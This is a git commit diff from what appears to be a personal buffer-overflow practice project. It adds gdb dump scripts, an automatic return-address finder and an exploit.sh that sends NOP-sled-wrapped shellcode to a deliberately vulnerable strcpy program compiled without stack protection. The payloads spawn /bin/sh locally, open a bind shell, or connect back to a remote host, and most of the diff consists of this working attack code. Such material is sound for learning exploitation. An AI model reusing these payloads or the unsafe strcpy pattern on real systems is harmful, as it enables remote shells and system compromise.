diff options
| author | Toni Uhlig <matzeton@googlemail.com> | 2017-04-13 03:57:20 +0200 |
|---|---|---|
| committer | Toni Uhlig <matzeton@googlemail.com> | 2017-04-13 03:57:20 +0200 |
| commit | 315745e24bf37a5fd8324e737272dc4b594dfd7e (patch) | |
| tree | 05bd3769284f7d592b4ea11544532503a3f9299c | |
| parent | bd131dc1d623c0708619ec95c5ece591e3462e89 (diff) | |
return adr finder
| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | Makefile | 2 | ||||
| -rw-r--r-- | dump32.gdb | 3 | ||||
| -rw-r--r-- | dump64.gdb | 3 | ||||
| -rwxr-xr-x | exploit.sh | 117 | ||||
| -rw-r--r-- | funcjmp_simple.c | 2 | ||||
| -rw-r--r-- | overflow.c | 9 |
7 files changed, 101 insertions, 36 deletions
@@ -8,4 +8,5 @@ sc-test sc-test_x64 funcjmp_simple funcjmp_ext +funcjmp_ext_x86 format @@ -4,7 +4,7 @@ RM := rm CC := gcc STRIP := strip LBITS := $(shell getconf LONG_BIT) -CFLAGS += -Wall +CFLAGS += -Wall -O0 OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static X86_FLAGS = -m32 -mpreferred-stack-boundary=2 X64_FLAGS = -m64 -mpreferred-stack-boundary=4 diff --git a/dump32.gdb b/dump32.gdb new file mode 100644 index 0000000..aa088da --- /dev/null +++ b/dump32.gdb @@ -0,0 +1,3 @@ +run +info r +x/300xw $esp-0x300 diff --git a/dump64.gdb b/dump64.gdb new file mode 100644 index 0000000..3facd15 --- /dev/null +++ b/dump64.gdb @@ -0,0 +1,3 @@ +run +info r +x/300xw $rsp-0x300 @@ -1,41 +1,100 @@ #!/bin/sh -# shellcode generated with metasploit (exec /bin/sh): +# generate shellcode with metasploit (exec /bin/sh): # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' # uses (currently) only self-written shellcode .. + +DIR="$(dirname $0)" + +find_return_adr32() { + if [ -z "$1" -o -z "$2" -o -z "$3" ]; then + return 1 + fi + ret=$(gdb -batch -x "${DIR}/dump32.gdb" --args $1 $2) + adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort) + if [ $? -ne 0 ]; then + echo "$0: no adr found: ${adr}" + return 1 + fi + chs=$(echo ${adr} | cut -d ' ' -f $3) + if [ $? -ne 0 ]; then + echo "$0: check adr index: $3" + return 1 + fi + echo $(echo "${chs}" | sed 's/0x\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)/\\x\4\\x\3\\x\2\\x\1/') + return 0 +} + +find_return_adr64() { + if [ -z "$1" -o -z "$2" -o -z "$3" ]; then + return 1 + fi + ret=$(gdb -batch -x "${DIR}/dump64.gdb" --args $1 $2) + adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort) + if [ $? -ne 0 ]; then + echo "$0: no adr found: ${adr}" + return 1 + fi + chs=$(echo ${adr} | cut -d ' ' -f $3) + if [ $? -ne 0 ]; then + echo "$0: check adr index: $3" + return 1 + fi +python - <<EOF +import struct, binascii +print repr(struct.pack('<Q', int('$chs',16)))[1:33] +EOF + return 0 +} + +if [ ! -f "${DIR}/overflow" -o ! -f "${DIR}/overflow_x64" ]; then + echo "$0: run make first!" + exit 1 +fi + +RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3) +RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3) + + if [ -z "$1" ]; then - echo "$0 [local|bind|connect]" + echo "$0 [local32|local64|bind32|bind64|connect32]" exit 1 fi -echo "$0: exec exploit ( x$(getconf LONG_BIT) ) .." -if [ "$1" = "local" ]; then - if [ $(getconf LONG_BIT) -eq 32 ]; then - # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr - # uses own shellcode: shellcode/hello.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\xc4\xf2\xff\xbf"'` - else - # 133xNOP + shellcode(34) + 145xNOP + return addr - # uses own shellcode: shellcode/execve_x64.o - ./overflow_x64 `python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "\x02\xe7\xff\xff\xff\x7f"'` - fi -elif [ "$1" = "bind" ]; then - if [ $(getconf LONG_BIT) -eq 32 ]; then - # 85xNOP + shellcode(134) + 85xNOP + return addr - # uses own shellcode: shellcode/socket.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'` - else - # 100xNOP + shellcode(149) + 63xNOP + return addr - # uses own shellcode: shellcode/socket_x64.asm (x64-nasm) - ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'` - fi -elif [ "$1" = "connect" ]; then - if [ $(getconf LONG_BIT) -eq 32 ]; then - # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr - # uses own shellcode: shellcode/connect.asm (x86-nasm) - ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'` - fi +if [ "$1" = "local32" ]; then + + # NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4) + # uses own shellcode: shellcode/hello.asm (x86-nasm) + echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}" + ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"') + +elif [ "$1" = "local64" ]; then + + # NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8) + # uses own shellcode: shellcode/execve_x64.o + echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}" + gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"') + +elif [ "$1" = "bind32" ]; then + + # 85xNOP + shellcode(134) + 85xNOP + return addr + # uses own shellcode: shellcode/socket.asm (x86-nasm) + ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'` + +elif [ "$1" = "bind64" ]; then + + # 100xNOP + shellcode(149) + 63xNOP + return addr + # uses own shellcode: shellcode/socket_x64.asm (x64-nasm) + ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'` + +elif [ "$1" = "connect32" ]; then + + # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr + # uses own shellcode: shellcode/connect.asm (x86-nasm) + ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'` + else $0 fi + diff --git a/funcjmp_simple.c b/funcjmp_simple.c index 63946c8..97db760 100644 --- a/funcjmp_simple.c +++ b/funcjmp_simple.c @@ -5,7 +5,7 @@ #define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \ asm volatile(_asm_str); \ asm volatile(".att_syntax prefix"); -#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void) +#define JUMPABLE_FUNC(fname) int fname(void) #define JMP_FUNC_DECL(func) void *fptr = (void *)( &func ); #define JMP_TO_FUNC \ INTEL_ASM(" \ @@ -13,20 +13,19 @@ #define BUFLEN 300 void -overflow(const char *src, char *dst) +overflow(const char *src) { + char buf[BUFLEN]; /* exploitable function */ - strcpy(dst, src); + strcpy(&buf[0], src); /* nothing to do, just return */ } int main(int argc, char **argv) { - char buf[BUFLEN]; - if (argc > 1) { - overflow(argv[1], buf); + overflow(argv[1]); } else { fprintf(stderr, "arg1 missing\n"); return(1); |